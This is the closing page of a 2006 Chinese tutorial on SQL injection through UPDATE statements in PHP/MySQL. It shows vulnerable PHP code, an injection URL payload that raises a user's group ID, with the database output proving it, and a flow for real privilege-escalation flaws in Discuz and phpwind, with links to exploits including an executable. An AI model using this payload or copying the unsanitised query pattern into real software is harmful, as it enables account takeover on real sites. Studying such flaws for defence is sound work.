开发学院网络安全黑客技术 UPDATE注射(mysql+php)的两个模式 阅读

UPDATE注射(mysql+php)的两个模式

 2006-07-04 20:31:44 来源:WEB开发网   
核心提示: $sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用单引号$result = mysql_db_query($dbname, $sql

$sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用单引号

$result = mysql_db_query($dbname, $sql);

mysql_fetch_array($result);  //$p的数据写入数据库

$sql= "select pass from userinfo where user=’heige’"; 

$result = mysql_db_query($dbname, $sql);

$userinfo=mysql_fetch_array($result); 

echo $userinfo[0]; //把pass查询输出给$userinfo[0]

$sql ="update userinfo set pass=’$userinfo[0]’ where user=’heige’";

$result = mysql_db_query($dbname, $sql);

mysql_fetch_array($result); //把$userinfo[0] 再次update

?>

我们测试下,提交:http://127.0.0.1/test3.php?p=123456’,groudid=’1

回mysql查询下 : mysql> select * from userinfo;

+---------+-------+--------+

| groudid | user | pass  |

+---------+-------+--------+

| 1    | heige | 123456 |

+---------+-------+--------+

1 row in set (0.00 sec)

HaHa~~ 成功注射 修改groudid为1。 这个就是我们的模式2了,简单的描叙如下:

update-->select-->update

四.实际模式

模式1:Discuz 2.0/2.2 register.php 注射 

漏洞分析:http://4ngel.net/article/41.htm

Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm

模式2:phpwind 2.0.2和3.31e 权限提升漏洞 

    漏洞分析:

update (profile.php 注射变量为$proicon update语句里为,icon=’$userdb[icon]’)

|

v

select (jop.php)

|

v

updtate (jop.php)

Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe  

五.鸣谢

特别感谢saiy等朋友的讨论和帮助。Thanks!!! 

上一页  1 2 3 4 

Tags:UPDATE 注射 mysql

编辑录入:爽爽 [复制链接] [打 印]
[]
  • 好
  • 好的评价 如果觉得好,就请您
      0%(0)
  • 差
  • 差的评价 如果觉得差,就请您
      0%(0)
赞助商链接